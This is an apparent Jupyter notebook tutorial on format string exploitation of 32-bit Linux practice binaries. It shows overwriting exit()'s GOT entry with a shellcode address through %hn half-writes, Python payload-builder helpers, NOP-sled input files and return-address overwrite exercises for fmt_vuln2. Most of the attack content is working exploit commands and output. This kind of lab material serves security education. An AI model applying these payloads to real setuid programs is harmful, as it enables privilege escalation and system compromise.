  6 .gnu.version  0000000c  0804827c  0804827c  0000027c  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version_r 00

## Overwriting the Global Offset Table
- the PLT (procedure linkage table) is used to call shared library functions
- it consists of many jump instructions, each one corresponding to a shared function
- each time a shared function is called, control passes through the PLT
- the objdump program can be used to see the .plt section
- exit() is called at the end of the program
- if the exit() call can be redirected into shellcode, a shell will be spawned (a root shell if the program is setuid root)
- most PLT entries do not jump to addresses directly but through pointers to addresses
    - e.g., the address of the exit() function is stored at `0x0804a018`
- these pointers live in another section, called the global offset table (GOT), which is writable

In [1]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08048350 <printf@plt-0x10>:
 8048350:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048356:	ff 25 08 a0 04 08    	jmp    *0x804a008
 804835c:	00 00                	add    %al,(%eax)
	...

08048360 <printf@plt>:
 8048360:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048366:	68 00 00 00 00       	push   $0x0
 804836b:	e9 e0 ff ff ff       	jmp    8048350 <_init+0x24>

08048370 <strcpy@plt>:
 8048370:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048376:	68 08 00 00 00       	push   $0x8
 804837b:	e9 d0 ff ff ff       	jmp    8048350 <_init+0x24>

08048380 <puts@plt>:
 8048380:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048386:	68 10 00 00 00       	push   $0x10
 804838b:	e9 c0 ff ff ff       	jmp    8048350 <_init+0x24>

08048390 <exit@plt>:
 8048390:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048396:	68 18 00 00 00       	push   $0x18
 804839b:	e9 b0 ff ff ff       	jmp    8048350 <_init+0x24>


In [30]:
# display all dynamic relocations
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804a014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.0
0804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804a020 R_386_JUMP_SLOT   putchar@GLIBC_2.0




- NOTE: exit()'s GOT entry is at `0x0804a018`, the same address that `exit@plt` jumps through
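
The link between a PLT stub and its GOT entry can be read straight from the instruction bytes in the disassembly. The sketch below is only an illustration: the helper name `got_slot_from_plt_stub` is made up here, and it assumes the i386 `ff 25` encoding of `jmp *addr` shown in the objdump output, with the 4-byte address stored in little-endian order.

```python
import struct

def got_slot_from_plt_stub(stub: bytes) -> int:
    """Return the address that an i386 `jmp *addr` (opcode ff 25) jumps through."""
    if stub[:2] != b"\xff\x25":
        raise ValueError("not an indirect jmp (ff 25)")
    # the 4 bytes after the opcode are the little-endian address of the GOT slot
    (addr,) = struct.unpack("<I", stub[2:6])
    return addr

# first instruction of exit@plt, copied from the objdump output
exit_plt = bytes.fromhex("ff 25 18 a0 04 08")
exit_got = got_slot_from_plt_stub(exit_plt)
print(hex(exit_got))
```

The result matches the `R_386_JUMP_SLOT` offset that `objdump -R` reports for exit().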

## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda; see the [GDB-Peda.ipynb](./GDB-Peda.ipynb) notebook for details
- use `perl -e 'print "<shellcode bytes>"' > shellcode.bin` to write the shellcode as a binary file
- export the shellcode as an environment variable
- find the address of the shellcode and write it into the GOT entry of the exit() function
- you'll get a shell when the program exits!

```
$ export SHELLCODE=$(cat shellcode.bin)
$ ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe
$ echo $((0xbfff - 8)) # higher two bytes, minus the 8 address bytes already printed
$ echo $((0xf020 - 0xbfff)) # lower two bytes, minus the bytes printed so far
# write to the higher two-byte address of exit()'s GOT entry first, then to the lower one
$ ./fmt_vuln.exe $(printf "\x1a\xa0\x04\x08\x18\xa0\x04\x08")%49143x%4\$hn%12321x%5\$hn
```
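
The width arithmetic above can be sketched in Python. This is a hedged illustration, not part of the original workflow: `half_write_payload` is a hypothetical helper, the shellcode address `0xbffff020` is inferred from the `0xbfff` and `0xf020` values in the commands, and the first controllable parameter is assumed to be the 4th, as in the exploit line.

```python
import struct

def half_write_payload(target_addr, value, first_param):
    """Build a payload that stores the 32-bit `value` at `target_addr`
    with two 2-byte %hn writes, smaller half first."""
    low, high = value & 0xFFFF, (value >> 16) & 0xFFFF
    # (address to write, 16-bit value); sorted so the byte count only has to grow
    writes = sorted([(target_addr, low), (target_addr + 2, high)],
                    key=lambda w: w[1])
    payload = b"".join(struct.pack("<I", addr) for addr, _ in writes)
    printed = len(payload)  # the 8 address bytes count as printed output
    for offset, (_, half) in enumerate(writes):
        pad = (half - printed) % 0x10000
        if pad < 8:
            # %Nx prints at least N characters but up to 8 hex digits,
            # so wrap the 16-bit counter instead of using a tiny width
            pad += 0x10000
        payload += f"%{pad}x%{first_param + offset}$hn".encode("ascii")
        printed += pad
    return payload

# exit()'s GOT entry and the assumed SHELLCODE address
payload = half_write_payload(0x0804a018, 0xbffff020, first_param=4)
print(payload)
```

Under these assumptions the result is the same byte string as the command-line argument above, without the shell escaping of `$`.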

### Advantage of using GOT
- GOT entries are fixed per binary (for binaries that are not position-independent executables)
    - different systems running the same binary will have the same GOT entry at the same address

- the ability to overwrite any arbitrary address opens up many possibilities for exploitation
- any section of writable memory that contains an address that directs the flow of program execution can be targeted

In [97]:
! cp ./booksrc/shellcodex86linuxexec .

In [98]:
# create SHELLCODE env variable
# NOTE: each `!` command runs in its own subshell, so this export does not persist to later cells
! export SHELLCODE=$(cat shellcodex86linuxexec)

In [100]:
# get the address of SHELLCODE variable
# run it in terminal if you do not see complete address!
! ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe

SHELLCODE will be at 0x4
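
Each `!` command runs in its own subshell, so an `export` made in one cell is not visible to the next. A minimal sketch of one workaround, assuming a Python kernel on a POSIX system: set the variable in the kernel's own environment, which child processes started later inherit. The bytes below are a harmless stand-in, not real shellcode; in the notebook they would be read from the `shellcodex86linuxexec` file.

```python
import os
import subprocess
import sys

# Stand-in bytes only (hypothetical); the real value would come from
# open("shellcodex86linuxexec", "rb").read()
placeholder = b"\x90" * 4

# os.environb accepts raw bytes (POSIX only) and updates the process environment
os.environb[b"SHELLCODE"] = placeholder

# A child process started afterwards inherits the variable
child = subprocess.run(
    [sys.executable, "-c",
     "import os, sys; sys.stdout.buffer.write(os.environb[b'SHELLCODE'])"],
    capture_output=True,
    check=True,
)
inherited = child.stdout
print(inherited == placeholder)
```

Running the commands in a single terminal session, as the cell comment suggests, avoids the issue altogether.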


## Exercise 1
- stash your shellcode in a shell environment variable and exploit the `format string` vulnerability in fmt_vuln2.c to execute it by overwriting the return address with the shellcode's address in the environment.
### steps:
- stash your shellcode in shell environment
- find the address of shellcode using getenvaddr program
- find the nth parameter that'll crash fmt_vuln2 program
```
$ perl -e 'print "AAAA%x%x%x%x%x%x%x"' | ./fmt_vuln2.exe 
$ perl -e 'print "AAAA%x%x%x%x%x%x%7\$x"' | ./fmt_vuln2.exe
$ perl -e 'print "return address%7\$n"' | ./fmt_vuln2.exe
$ perl -e 'print "two return addresses%widthx%7\$hn%widthx%8\$hn"' | ./fmt_vuln2.exe
```
- do the math for the two widths, then overwrite the return address with the shellcode address using two half-writes (`%hn`)

## Exercise 2
- Smuggle your `shellcode` into the program as part of the input data and exploit the `format string` vulnerability in the fmt_vuln2.c program found in this repo by modifying the return address to point to the exploit code.
### steps

```
- compile and make fmt_vuln2.c program a privileged program
- run the program to note the return address and the address of input buffer
- create an exploit file with 12 (NOP sled) + 24 (shellcode) bytes; it is easier if the total byte count is a multiple of 4
$ perl -e 'print "\x90"x12' > fmt_vuln2exploit.txt
$ cat shellcode.bin >> fmt_vuln2exploit.txt
$ wc -c fmt_vuln2exploit.txt
- find out the parameter count where AAAA repeats
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"')
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15\$x"')
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%15\$x"')
- now find the width parameter to write the address of input buffer at the return address
$ echo $((0xf057-36-8)) # lower two bytes minus 36 exploit bytes and 8 address bytes => 61483
$ echo $((0x1bfff-0xf057)) # higher two bytes, wrapped past 0xffff => 53160
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "\xcc\xec\xff\xbf\xce\xec\xff\xbf%61483x%15\$n%53160x%16\$hn"')
```
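
The two widths in the last command can be checked with a few lines of Python. This is a sketch under the assumptions visible in the commands above: the input buffer address is `0xbffff057`, and 36 exploit bytes plus 8 address bytes are printed before the first padded `%x`. The second write needs `0xbfff`, which is smaller than the `0xf057` bytes already printed, so the 16-bit counter is wrapped by working with `0x1bfff`.

```python
# bytes printed before the first padded %x: exploit file + two 4-byte addresses
printed_before = 36 + 8

# halves of the assumed buffer address 0xbffff057
low_half, high_half = 0xf057, 0xbfff

# first write: pad until the byte count equals the low half
width1 = low_half - printed_before

# second write: the count is already past 0xbfff, so wrap modulo 0x10000;
# this is the same as 0x1bfff - 0xf057
width2 = (high_half - low_half) % 0x10000

print(width1, width2)
```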